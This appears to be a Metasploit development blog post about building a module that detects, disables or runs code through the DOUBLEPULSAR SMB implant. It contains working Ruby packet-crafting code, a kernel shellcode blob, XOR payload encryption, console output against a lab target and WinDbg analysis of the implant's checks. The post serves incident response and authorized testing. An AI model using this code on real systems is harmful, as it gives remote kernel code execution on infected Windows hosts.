Open-Source Command and Control of the DOUBLEPULSAR Implant

Metasploit’s Development Diaries series sheds light on how Rapid7’s offensive research team analyzes vulnerabilities as candidates for inclusion in Metasploit Framework: in other words, how a vulnerability makes it through rigorous open-source committee to become a full-fledged Metasploit module. You can find previous Metasploit development diaries here and here. This quarter, we're going in a slightly different direction and detailing a path to remote code execution not in public-use hardware or software, but in a backdoor widely attributed to the NSA.

Metasploit's research team recently added a module to Framework that executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB. The DOUBLEPULSAR RCE module allows users to remotely disable the implant, which puts it in the rare (though not unique) category of Metasploit modules that have specific incident response utility in addition to offensive value.

Introduction

With RDP vulnerabilities being all the rage these days, I decided to revisit an unfinished idea I had when SMB vulnerabilities were still in vogue.

If infosec can rewind its memory two years, the Shadow Brokers leaked the so-called Equation Group's toolkit for Windows exploitation. Perhaps the most damaging code in that release was ETERNALBLUE, an SMB remote root exploit against a vast range of Windows versions. The code would quickly make its way into the WannaCry worm, which locked hundreds of thousands of systems in its cryptographic shackles.

On the same day as ETERNALBLUE, the world was introduced to DOUBLEPULSAR, a kernel-mode implant typically deployed by the exploit. DOUBLEPULSAR (hereafter referred to as DOPU or "the implant") had the ability to infect both SMB and RDP, but with the critical nature of ETERNALBLUE, SMB was the focus for most researchers. While most efforts were directed at detecting the implant via its "ping" functionality, the implant also had the capability to execute arbitrary kernel shellcode or to be disabled remotely. Perhaps most damning (or desirable) was the fact that the implant lacked authentication, offering an attribution-less backdoor into Windows systems around the world.

zerosum0x0 was one of the first researchers to analyze DOUBLEPULSAR. It was his work that I used to begin understanding the implant and its functionality. It is highly recommended reading. The rest of this post will concern the analysis we performed to exercise the implant's arbitrary code execution.

Why did we do this?

When ETERNALBLUE and DOUBLEPULSAR came to light, many people used the Fuzzbunch exploitation framework (part of the Shadow Brokers dump) to execute ETERNALBLUE against a target, infect it with DOPU, and then use DOPU's DLL injection functionality (bootstrapped from its "exec" functionality) to inject a DLL payload into a userland process, bringing trivial ring3 code execution to a ring0 implant.

While this was fun and all, it posed a dangerous question: why would one purposefully infect a target with alleged NSA weapons-grade malware, just to gain code execution? Sure, it was the most accessible way to root unpatched Windows systems, but many users didn't think deeply about the ramifications. Fortunately, the research community directed its efforts at implementing the ETERNALBLUE exploit in open source, eschewing the closed-source, nation-state toolkit we knew so little about.

So, what if a target is already infected with DOUBLEPULSAR? The overarching opinion (rightfully so) is that your assessment has become an incident response situation. In that case, it may be helpful for defenders to be able to disable the implant without rebooting systems. Alternatively, it may be useful for pentesters (with proper approval) to leverage code execution against the implant using fully vetted, open-source tools, without the need to cast an exploit. There is already precedent for executing code against malware, some examples of which live in Metasploit. In any case, a forensic examination of infected systems is necessary, and disabling the implant doesn't obsolete patching.

Consequently, with our minds unburdened, and a healthy two years later, we sought to open-source code execution and neutralization of DOUBLEPULSAR in Metasploit. Let's walk through the development process.

The art of Ctrl-C, Ctrl-V

Everyone has done it at some point. Especially on Metasploit modules. And if you don't, you probably copy and paste your own code! (That's what I do most of the time. ;)

As zerosum0x0's MS17-010 and DOUBLEPULSAR scanner provided the perfect framework to hit the ground running, I shamelessly copied the file to a new module, which I named exploit/windows/smb/doublepulsar_rce. Having worked on the scanner, I was confident it would be a good starting point.

Give me a ping, Vasily. One ping only, please.

The scanner already implemented DOUBLEPULSAR's ping command to detect the implant. Moving the code to a check method, I gave it a go:

msf5 exploit(windows/smb/doublepulsar_rce) > check

[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[+] 192.168.56.115:445 - The target is vulnerable.
msf5 exploit(windows/smb/doublepulsar_rce) >

Cool, the module detected the implant correctly. More importantly, note that the implant returns its XOR key, which we'll use later to "encrypt" our shellcode for code execution.

Next up, implementing the kill command seemed like another easy win.

Ping, pong, the implant's dead

To improve code reuse, I defined a couple hashes for the implant's opcodes and status codes:

OPCODES = {
  ping: 0x23,
  exec: 0xc8,
  kill: 0x77
}

STATUS_CODES = {
  not_detected:   0x00,
  success:        0x10,
  invalid_params: 0x20,
  alloc_failure:  0x30
}

We also have a few utility methods, some from the scanner, to calculate implant status, XOR key, and architecture. These values are hidden in plain sight within real SMB packet values.

def calculate_doublepulsar_status(m1, m2)
  STATUS_CODES.key(m2.to_i - m1.to_i)
end

# algorithm to calculate the XOR Key for DoublePulsar knocks
def calculate_doublepulsar_xor_key(s)
  x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))
  x & 0xffffffff  # this line was added just to truncate to 32 bits
end

# The arch is adjacent to the XOR key in the SMB signature
def calculate_doublepulsar_arch(s)
  s == 0 ? ARCH_X86 : ARCH_X64
end
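To make the key derivation a little less opaque, here is a standalone sketch that runs outside of Metasploit. The names `xor_key_original`, `bswap32`, `xor_key_bswap`, and `doublepulsar_status` are mine, not the module's. Reading the formula as "shift left by one, XOR with the byte-swapped value" is my own interpretation, though it appears to line up with the `bswap ecx` / `shl eax,1` / `xor eax,ecx` byte sequence (0f c9 d1 e0 31 c8) visible near the end of the memory dump in the Caveats section. Treating `m1` and `m2` as the request and response Multiplex IDs is an assumption based on zerosum0x0's analysis, and the sample values are arbitrary.

```ruby
STATUS_CODES = {
  not_detected:   0x00,
  success:        0x10,
  invalid_params: 0x20,
  alloc_failure:  0x30
}.freeze

# Same formula as the module's calculate_doublepulsar_xor_key
def xor_key_original(s)
  x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))
  x & 0xffffffff
end

# Hypothetical helper: reverse the byte order of a 32-bit value
def bswap32(s)
  [s].pack('V').unpack1('N')
end

# Hypothetical restatement: (s << 1) XOR bswap32(s), truncated to 32 bits
def xor_key_bswap(s)
  ((s << 1) ^ bswap32(s)) & 0xffffffff
end

# The status is the difference between two values (assumed: Multiplex IDs)
def doublepulsar_status(m1, m2)
  STATUS_CODES.key(m2.to_i - m1.to_i)
end

# Arbitrary 32-bit sample values, not captured from a real implant
[0x1, 0x9cf9c567, 0xffffffff].each do |s|
  puts format('s=0x%08X original=0x%08X bswap=0x%08X',
              s, xor_key_original(s), xor_key_bswap(s))
end

p doublepulsar_status(0x41, 0x51)
```

If the two columns agree for every input you try, the shorter form is probably the easier one to reason about when reading the implant's disassembly.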

Since the kill command is just the ping command with a different opcode (0x77 vs. 0x23), implementing the kill command was a breeze. I added a method to generate the expected SMB timeout value for a given opcode, based on zerosum0x0's analysis:

def generate_doublepulsar_timeout(op)
  k = SecureRandom.random_bytes(4).unpack('V').first
  0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00
end
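The timeout generator is easier to trust once you see it round-trip. The sketch below assumes, per zerosum0x0's analysis, that the implant recovers the opcode by summing the four bytes of the Timeout field and keeping the low byte. The decoder name `decode_doublepulsar_opcode` is hypothetical and exists only for this illustration.

```ruby
require 'securerandom'

OPCODES = { ping: 0x23, exec: 0xc8, kill: 0x77 }.freeze

# Same logic as the module's generate_doublepulsar_timeout
def generate_doublepulsar_timeout(op)
  k = SecureRandom.random_bytes(4).unpack('V').first
  0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00
end

# Hypothetical decoder: sum the four timeout bytes and keep the low byte
# (assumed to mirror what the implant does on its side)
def decode_doublepulsar_opcode(timeout)
  [timeout].pack('V').bytes.sum & 0xff
end

OPCODES.each do |name, op|
  timeout = generate_doublepulsar_timeout(op)
  decoded = decode_doublepulsar_opcode(timeout)
  puts format('%-4s timeout=0x%08X decoded=0x%02X', name, timeout, decoded)
end
```

The two middle bytes come straight from the random value, and the low byte is chosen so that the byte sum lands on the opcode. That is why the timeout looks different on every request while still carrying the same command.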

Then I shamelessly copied the trans2 method from lib/rex/proto/smb/client.rb. I ended up with the following code for an SMB TRANS2_SESSION_SETUP packet:

def make_smb_trans2_doublepulsar(opcode, body)
  setup_count = 1
  setup_data = [0x000e].pack('v')

  param = generate_doublepulsar_param(opcode, body)
  data = param + body.to_s

  pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct
  simple.client.smb_defaults(pkt['Payload']['SMB'])

  base_offset = pkt.to_s.length + (setup_count * 2) - 4
  param_offset = base_offset
  data_offset = param_offset + param.length

  pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2
  pkt['Payload']['SMB'].v['Flags1'] = 0x18
  pkt['Payload']['SMB'].v['Flags2'] = 0xc007

  @multiplex_id = rand(0xffff)

  pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count
  pkt['Payload']['SMB'].v['TreeID'] = @tree_id
  pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id

  pkt['Payload'].v['ParamCountTotal'] = param.length
  pkt['Payload'].v['DataCountTotal'] = body.to_s.length
  pkt['Payload'].v['ParamCountMax'] = 1
  pkt['Payload'].v['DataCountMax'] = 0
  pkt['Payload'].v['ParamCount'] = param.length
  pkt['Payload'].v['ParamOffset'] = param_offset
  pkt['Payload'].v['DataCount'] = body.to_s.length
  pkt['Payload'].v['DataOffset'] = data_offset
  pkt['Payload'].v['SetupCount'] = setup_count
  pkt['Payload'].v['SetupData'] = setup_data
  pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)
  pkt['Payload'].v['Payload'] = data

  pkt.to_s
end

Hopeful that my code would work on the first try, I tested the new implant neutralization code:

msf5 exploit(windows/smb/doublepulsar_rce) > set target Neutralize\ implant
target => Neutralize implant
msf5 exploit(windows/smb/doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[*] 192.168.56.115:445 - Neutralizing DOUBLEPULSAR
[+] 192.168.56.115:445 - Implant neutralization successful
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/doublepulsar_rce) >

Success! If you were to run check again, the implant should not be detected:

msf5 exploit(windows/smb/doublepulsar_rce) > check

[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[-] 192.168.56.115:445 - DOUBLEPULSAR not detected or disabled
[*] 192.168.56.115:445 - The target is not exploitable.
msf5 exploit(windows/smb/doublepulsar_rce) >

With two of the three implant commands implemented, it was time to focus on the third and final: the Holy Grail of code execution.

What is your quest? To seek the Holy Grail!

Because DOUBLEPULSAR expects to execute kernel shellcode, we couldn't use any Metasploit payloads without a kernel-mode stub first, and we surely didn't want to use the Equation Group's DLL injection shellcode, even though Countercept (now F-Secure) had analyzed it sufficiently.

Thankfully, zerosum0x0 wrote custom shellcode for ETERNALBLUE that could be repurposed for DOUBLEPULSAR, albeit with a small modification. Since the syscall overwrite in the copied shellcode was unnecessary for this use case, we undefined it:

diff --git a/external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm b/external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
index bff0b1fd73..1d867a9ebf 100644
--- a/external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
+++ b/external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
@@ -41,7 +41,7 @@ global payload_start
 %define USE_X64                       ; x64 payload
 ;%define STATIC_ETHREAD_DELTA          ; use a pre-calculated ThreadListEntry
 %define ERROR_CHECKS                  ; lessen chance of BSOD, but bigger size
-%define SYSCALL_OVERWRITE             ; to run at process IRQL in syscall
+%undef SYSCALL_OVERWRITE             ; to run at process IRQL in syscall
 ; %define CLEAR_DIRECTION_FLAG         ; if cld should be run

 ; hashes for export directory lookups

I reassembled the modified shellcode with nasm -w-other -o >(xxd -p -c 16 | sed 's/../\\x&/g') external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm and updated the module:

def make_kernel_shellcode(proc_name)
  # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
  # Length: 780 bytes
  "\x31\xc9\x41\xe2\x01\xc3\x56\x41\x57\x41\x56\x41\x55\x41\x54\x53" +
  "\x55\x48\x89\xe5\x66\x83\xe4\xf0\x48\x83\xec\x20\x4c\x8d\x35\xe3" +
  "\xff\xff\xff\x65\x4c\x8b\x3c\x25\x38\x00\x00\x00\x4d\x8b\x7f\x04" +
  "\x49\xc1\xef\x0c\x49\xc1\xe7\x0c\x49\x81\xef\x00\x10\x00\x00\x49" +
  "\x8b\x37\x66\x81\xfe\x4d\x5a\x75\xef\x41\xbb\x5c\x72\x11\x62\xe8" +
  "\x18\x02\x00\x00\x48\x89\xc6\x48\x81\xc6\x08\x03\x00\x00\x41\xbb" +
  "\x7a\xba\xa3\x30\xe8\x03\x02\x00\x00\x48\x89\xf1\x48\x39\xf0\x77" +
  "\x11\x48\x8d\x90\x00\x05\x00\x00\x48\x39\xf2\x72\x05\x48\x29\xc6" +
  "\xeb\x08\x48\x8b\x36\x48\x39\xce\x75\xe2\x49\x89\xf4\x31\xdb\x89" +
  "\xd9\x83\xc1\x04\x81\xf9\x00\x00\x01\x00\x0f\x8d\x66\x01\x00\x00" +
  "\x4c\x89\xf2\x89\xcb\x41\xbb\x66\x55\xa2\x4b\xe8\xbc\x01\x00\x00" +
  "\x85\xc0\x75\xdb\x49\x8b\x0e\x41\xbb\xa3\x6f\x72\x2d\xe8\xaa\x01" +
  "\x00\x00\x48\x89\xc6\xe8\x50\x01\x00\x00\x41\x81\xf9" +
  generate_process_hash(proc_name.upcase) +
  "\x75\xbc\x49\x8b\x1e\x4d\x8d\x6e\x10\x4c\x89\xea\x48\x89\xd9" +
  "\x41\xbb\xe5\x24\x11\xdc\xe8\x81\x01\x00\x00\x6a\x40\x68\x00\x10" +
  "\x00\x00\x4d\x8d\x4e\x08\x49\xc7\x01\x00\x10\x00\x00\x4d\x31\xc0" +
  "\x4c\x89\xf2\x31\xc9\x48\x89\x0a\x48\xf7\xd1\x41\xbb\x4b\xca\x0a" +
  "\xee\x48\x83\xec\x20\xe8\x52\x01\x00\x00\x85\xc0\x0f\x85\xc8\x00" +
  "\x00\x00\x49\x8b\x3e\x48\x8d\x35\xe9\x00\x00\x00\x31\xc9\x66\x03" +
  "\x0d\xd7\x01\x00\x00\x66\x81\xc1\xf9\x00\xf3\xa4\x48\x89\xde\x48" +
  "\x81\xc6\x08\x03\x00\x00\x48\x89\xf1\x48\x8b\x11\x4c\x29\xe2\x51" +
  "\x52\x48\x89\xd1\x48\x83\xec\x20\x41\xbb\x26\x40\x36\x9d\xe8\x09" +
  "\x01\x00\x00\x48\x83\xc4\x20\x5a\x59\x48\x85\xc0\x74\x18\x48\x8b" +
  "\x80\xc8\x02\x00\x00\x48\x85\xc0\x74\x0c\x48\x83\xc2\x4c\x8b\x02" +
  "\x0f\xba\xe0\x05\x72\x05\x48\x8b\x09\xeb\xbe\x48\x83\xea\x4c\x49" +
  "\x89\xd4\x31\xd2\x80\xc2\x90\x31\xc9\x41\xbb\x26\xac\x50\x91\xe8" +
  "\xc8\x00\x00\x00\x48\x89\xc1\x4c\x8d\x89\x80\x00\x00\x00\x41\xc6" +
  "\x01\xc3\x4c\x89\xe2\x49\x89\xc4\x4d\x31\xc0\x41\x50\x6a\x01\x49" +
  "\x8b\x06\x50\x41\x50\x48\x83\xec\x20\x41\xbb\xac\xce\x55\x4b\xe8" +
  "\x98\x00\x00\x00\x31\xd2\x52\x52\x41\x58\x41\x59\x4c\x89\xe1\x41" +
  "\xbb\x18\x38\x09\x9e\xe8\x82\x00\x00\x00\x4c\x89\xe9\x41\xbb\x22" +
  "\xb7\xb3\x7d\xe8\x74\x00\x00\x00\x48\x89\xd9\x41\xbb\x0d\xe2\x4d" +
  "\x85\xe8\x66\x00\x00\x00\x48\x89\xec\x5d\x5b\x41\x5c\x41\x5d\x41" +
  "\x5e\x41\x5f\x5e\xc3\xe9\xb5\x00\x00\x00\x4d\x31\xc9\x31\xc0\xac" +
  "\x41\xc1\xc9\x0d\x3c\x61\x7c\x02\x2c\x20\x41\x01\xc1\x38\xe0\x75" +
  "\xec\xc3\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" +
  "\x20\x48\x8b\x12\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x45\x31\xc9" +
  "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1" +
  "\xe2\xee\x45\x39\xd9\x75\xda\x4c\x8b\x7a\x20\xc3\x4c\x89\xf8\x41" +
  "\x51\x41\x50\x52\x51\x56\x48\x89\xc2\x8b\x42\x3c\x48\x01\xd0\x8b" +
  "\x80\x88\x00\x00\x00\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20" +
  "\x49\x01\xd0\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\xe8\x78\xff" +
  "\xff\xff\x45\x39\xd9\x75\xec\x58\x44\x8b\x40\x24\x49\x01\xd0\x66" +
  "\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48" +
  "\x01\xd0\x5e\x59\x5a\x41\x58\x41\x59\x41\x5b\x41\x53\xff\xe0\x56" +
  "\x41\x57\x55\x48\x89\xe5\x48\x83\xec\x20\x41\xbb\xda\x16\xaf\x92" +
  "\xe8\x4d\xff\xff\xff\x31\xc9\x51\x51\x51\x51\x41\x59\x4c\x8d\x05" +
  "\x1a\x00\x00\x00\x5a\x48\x83\xec\x20\x41\xbb\x46\x45\x1b\x22\xe8" +
  "\x68\xff\xff\xff\x48\x89\xec\x5d\x41\x5f\x5e\xc3"
end

Metasploit has an extensive library of code for exploitation, but it curiously didn't have any such code for XOR with a variable-length key, so I went ahead and added it to the Rex::Text.xor method. This would be a requirement for DOUBLEPULSAR's XOR stream cipher, which would be used to encrypt the shellcode.

print_status("Generating kernel shellcode with #{datastore['PAYLOAD']}")
shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])
shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)
vprint_status("Total shellcode length: #{shellcode.length} bytes")

print_status("Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}")
xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)

Because DOUBLEPULSAR expects shellcode to be chunked in 4096-byte blocks, and our total shellcode size falls well within that chunk size, we pad the difference after the user-mode payload with random bytes and send only one 4096-byte chunk. This ensures consistent shellcode size and alignment, and it provides a modicum of obfuscation. Since the kernel shellcode calls the CreateThread function, and the EXITFUNC option in Metasploit is set to thread, there are no issues with the random padding. Yeah, it's a hack.
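For readers without a Metasploit checkout handy, the padding and "encryption" steps can be approximated in plain Ruby. This is only a sketch: `xor_with_key` and `pad_shellcode` are hypothetical stand-ins rather than `Rex::Text.xor` or the module's own code, `SecureRandom` replaces `Rex::Text.rand_text`, the 4096-byte value for `MAX_SHELLCODE_SIZE` is assumed from the chunk size described above, and the three "shellcode" bytes are placeholders.

```ruby
require 'securerandom'

MAX_SHELLCODE_SIZE = 4096 # assumed: one 4096-byte chunk

# Hypothetical repeating-key XOR; a stand-in, not Rex::Text.xor itself
def xor_with_key(key, data)
  key_bytes = key.bytes
  data.bytes.each_with_index.map { |b, i| b ^ key_bytes[i % key_bytes.length] }.pack('C*')
end

# Hypothetical helper: pad with random bytes up to the chunk size
def pad_shellcode(shellcode, size = MAX_SHELLCODE_SIZE)
  raise ArgumentError, 'shellcode too large for one chunk' if shellcode.bytesize > size

  shellcode.b + SecureRandom.random_bytes(size - shellcode.bytesize)
end

xor_key   = 0x33C6DC64                      # key reported by the ping above
key       = [xor_key].pack('V')             # packed little-endian, as in the module
shellcode = pad_shellcode("\x90\x90\xc3".b) # placeholder bytes, not a real payload
encoded   = xor_with_key(key, shellcode)

puts "padded length: #{shellcode.bytesize}"
puts "round trip ok: #{xor_with_key(key, encoded) == shellcode}"
```

Because XOR is its own inverse, applying the same key a second time recovers the original bytes, which is what the implant has to do before it can run anything we send.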

The last piece of the puzzle

When I crafted the SMB TRANS2_SESSION_SETUP packet, I zeroed out its parameters, since they weren't necessary for the ping and kill commands. However, the exec command required specific parameters to be sent. I didn't know what to fill them with yet, but it was clear the XOR key was involved.

With zeroed-out parameters, code execution was blocked by checks in the implant. Since I had been working on the module for most of an evening, having failed to determine the correct parameters (short of breaking out WinDbg), I shelved the module to work on another task. Some time later, I reached out to Jacob to see if he was interested in figuring out the missing piece.

The following analysis is adapted from notes by former Metasploit researcher Jacob Robles.

We begin our analysis of the implant's checks by viewing its handler in WinDbg. Using the command from the deadlisting, we get the address of the implant's code in memory on the target system:

kd> dps srv!SrvTransaction2DispatchTable
fffff880`03a2c760  fffff880`03a96110 srv!SrvSmbOpen2
fffff880`03a2c768  fffff880`03a5d3e0 srv!SrvSmbFindFirst2
fffff880`03a2c770  fffff880`03a938d0 srv!SrvSmbFindNext2
fffff880`03a2c778  fffff880`03a5f570 srv!SrvSmbQueryFsInformation
fffff880`03a2c780  fffff880`03a886e0 srv!SrvSmbSetFsInformation
fffff880`03a2c788  fffff880`03a5cf30 srv!SrvSmbQueryPathInformation
fffff880`03a2c790  fffff880`03a96640 srv!SrvSmbSetPathInformation
fffff880`03a2c798  fffff880`03a5ae40 srv!SrvSmbQueryFileInformation
fffff880`03a2c7a0  fffff880`03a5ee90 srv!SrvSmbSetFileInformation
fffff880`03a2c7a8  fffff880`03a7c8d0 srv!SrvSmbFindNotify
fffff880`03a2c7b0  fffff880`03a96470 srv!SrvSmbIoctl2
fffff880`03a2c7b8  fffff880`03a7c8d0 srv!SrvSmbFindNotify
fffff880`03a2c7c0  fffff880`03a7c8d0 srv!SrvSmbFindNotify
fffff880`03a2c7c8  fffff880`03a88e80 srv!SrvSmbCreateDirectory2
fffff880`03a2c7d0  fffffa80`0226e060
fffff880`03a2c7d8  fffff880`03a7c6d0 srv!SrvTransactionNotImplemented

The address of the implant's handler is at offset 0x70 from the start of the dispatch table. We then retrieve the handler's disassembly by running u poi(srv!SrvTransaction2DispatchTable+0x70) L100:

kd> u poi(srv!SrvTransaction2DispatchTable+0x70) L100
fffffa80`0226e060 57              push    rdi
fffffa80`0226e061 56              push    rsi
fffffa80`0226e062 53              push    rbx
fffffa80`0226e063 55              push    rbp
fffffa80`0226e064 4154            push    r12
fffffa80`0226e066 4155            push    r13
fffffa80`0226e068 4156            push    r14
fffffa80`0226e06a 4157            push    r15
fffffa80`0226e06c 4989e4          mov     r12,rsp
fffffa80`0226e06f 4881ec08010000  sub     rsp,108h
fffffa80`0226e076 4989cf          mov     r15,rcx
fffffa80`0226e079 488d2de0ffffff  lea     rbp,[fffffa80`0226e060]
fffffa80`0226e080 6681e500f0      and     bp,0F000h
fffffa80`0226e085 48894d58        mov     qword ptr [rbp+58h],rcx
[snip]

The module at the time showed 0xc8 as the code for shellcode execution through the implant, which is also listed in the deadlisting. However, shellcode execution was failing with a status that indicated invalid parameters, 0x20. The branch for the 0xc8 code shows the checks that need to be passed for shellcode execution.

The first check is shown in the following disassembly:

fffffa80`0226e0fd 4831db          xor     rbx,rbx
fffffa80`0226e100 4831f6          xor     rsi,rsi
fffffa80`0226e103 4831ff          xor     rdi,rdi
fffffa80`0226e106 498b45d8        mov     rax,qword ptr [r13-28h]   ; SESSION_SETUP Parameters pointer
fffffa80`0226e10a 8b18            mov     ebx,dword ptr [rax]
fffffa80`0226e10c 8b7004          mov     esi,dword ptr [rax+4]
fffffa80`0226e10f 8b7808          mov     edi,dword ptr [rax+8]
fffffa80`0226e112 8b4d48          mov     ecx,dword ptr [rbp+48h]   ; XOR key
fffffa80`0226e115 31cb            xor     ebx,ecx                   ; Total shellcode size
fffffa80`0226e117 31ce            xor     esi,ecx                   ; Size of shellcode data in this request
fffffa80`0226e119 31cf            xor     edi,ecx                   ; Offset within shellcode buffer to start copying data to
fffffa80`0226e11b 413b7510        cmp     esi,dword ptr [r13+10h]
fffffa80`0226e11f 757b            jne     fffffa80`0226e19c         ; Invalid parameters

After a few registers are cleared, ebx, esi, and edi are set to values taken from the SMB Trans2 request, specifically offsets within the SESSION_SETUP parameters pointed to by rax. The registers are then XORed with the ecx register, which contains the XOR key. Then the comparison determines whether the XORed value from the SESSION_SETUP parameters (offset + 4) matches the Total Data Count field, [r13+10h], of the Trans2 request. This means the second 4-byte block of SESSION_SETUP parameters should be key ^ total data count to pass the first parameter check.

After the first check, another comparison occurs, but this time the comparison is with the first 4-byte block of the SESSION_SETUP parameters:

fffffa80`0226e121 3b5d54          cmp     ebx,dword ptr [rbp+54h]   ; Stored shellcode size
fffffa80`0226e124 488b454c        mov     rax,qword ptr [rbp+4Ch]   ; Stored shellcode buffer pointer
fffffa80`0226e128 7416            je      fffffa80`0226e140
fffffa80`0226e12a e8d1000000      call    fffffa80`0226e200
fffffa80`0226e12f 488d5304        lea     rdx,[rbx+4]
fffffa80`0226e133 4831c9          xor     rcx,rcx
fffffa80`0226e136 ff5510          call    qword ptr [rbp+10h]       ; nt!ExAllocatePool
fffffa80`0226e139 4889454c        mov     qword ptr [rbp+4Ch],rax   ; Store shellcode pointer
fffffa80`0226e13d 895d54          mov     dword ptr [rbp+54h],ebx   ; Store shellcode size

This comparison checks if a stored global value, [rbp+54h], equals the XORed first 4-byte SESSION_SETUP parameters block. The data stored at [rbp+54h] is zero or the number of bytes that have previously been allocated for the shellcode. If previously allocated bytes match with the 4-byte block, then the rest of that code segment is jumped over. Otherwise, nt!ExAllocatePool is called to allocate a buffer for the shellcode. The shellcode pointer is stored at [rbp+4Ch], and the number of bytes allocated is stored at [rbp+54h].

Since an allocation may occur in the previous block of code, the following block checks for a NULL shellcode pointer:

fffffa80`0226e140 4885c0          test    rax,rax
fffffa80`0226e143 745b            je      fffffa80`0226e1a0  ; ALLOC failed
fffffa80`0226e145 4801f7          add     rdi,rsi            ; Offset within buffer + Size of shellcode data in request
fffffa80`0226e148 4839df          cmp     rdi,rbx
fffffa80`0226e14b 774f            ja      fffffa80`0226e19c  ; Invalid parameters

If the shellcode pointer is NULL, then the code jumps to a location that will return an "allocation failed" status code, 0x30. If the allocation succeeded, then another check is performed to validate the size of the data that will be copied into the shellcode buffer. This check fails if the offset within the buffer at which copying starts, plus the size of the shellcode data in the Trans2 request, is larger than the allocated shellcode buffer size. This ensures that data won't be copied past the allocated buffer region.
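The checks so far can be modeled in a few lines of Ruby, which also shows why zeroed-out parameters earn a 0x20 status. This is a simplified sketch of my reading of the disassembly, not the implant's actual logic: `check_exec_params` is a hypothetical name, the allocation step is assumed to succeed, and the key is the one from the earlier ping output.

```ruby
# Status codes as defined in the module (subset)
STATUS_CODES = { success: 0x10, invalid_params: 0x20, alloc_failure: 0x30 }.freeze

# Hypothetical model of the exec parameter checks described above
def check_exec_params(params, xor_key, data_count_total)
  # Three little-endian dwords, each XORed with the key
  total_size, chunk_size, offset = params.unpack('V3').map { |v| v ^ xor_key }

  # First check: cmp esi, dword ptr [r13+10h]
  return :invalid_params unless chunk_size == data_count_total

  # Allocation and NULL check omitted; assumed to succeed in this model

  # Bounds check: add rdi, rsi / cmp rdi, rbx / ja
  return :invalid_params if offset + chunk_size > total_size

  :success
end

xor_key = 0x33C6DC64
zeroed  = "\x00" * 12
valid   = [4096, 4096, 0].map { |v| v ^ xor_key }.pack('V3')

[zeroed, valid].each do |params|
  status = check_exec_params(params, xor_key, 4096)
  puts format('%-14s 0x%02X', status, STATUS_CODES[status])
end
```

With zeroed parameters, every decoded field equals the XOR key itself, so the size comparison fails unless the key happens to equal the data count.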

After the checks are passed, the shellcode data from the Trans2 request is copied into memory and decoded:

fffffa80`0226e14d 4829f7          sub     rdi,rsi
fffffa80`0226e150 4801c7          add     rdi,rax                          ; Offset into allocated shellcode buffer
fffffa80`0226e153 57              push    rdi
fffffa80`0226e154 4889f1          mov     rcx,rsi
fffffa80`0226e157 51              push    rcx
fffffa80`0226e158 498b75e8        mov     rsi,qword ptr [r13-18h]          ; Trans2 Request SESSION_SETUP Data
fffffa80`0226e15c f3a4            rep movs byte ptr [rdi],byte ptr [rsi]   ; Copy SESSION_SETUP Data to shellcode buffer
fffffa80`0226e15e 59              pop     rcx
fffffa80`0226e15f 48c1e902        shr     rcx,2
fffffa80`0226e163 5e              pop     rsi
fffffa80`0226e164 8b5548          mov     edx,dword ptr [rbp+48h]          ; XOR key
fffffa80`0226e167 3116            xor     dword ptr [rsi],edx              ; Decode shellcode
fffffa80`0226e169 4883c604        add     rsi,4
fffffa80`0226e16d e2f8            loop    fffffa80`0226e167                ; Decode 4-byte blocks at a time
fffffa80`0226e16f 4801d8          add     rax,rbx
fffffa80`0226e172 4839c6          cmp     rsi,rax
fffffa80`0226e175 7c21            jl      fffffa80`0226e198                ; Success, expect more data
fffffa80`0226e177 ff554c          call    qword ptr [rbp+4Ch]              ; Call shellcode
fffffa80`0226e17a e881000000      call    fffffa80`0226e200

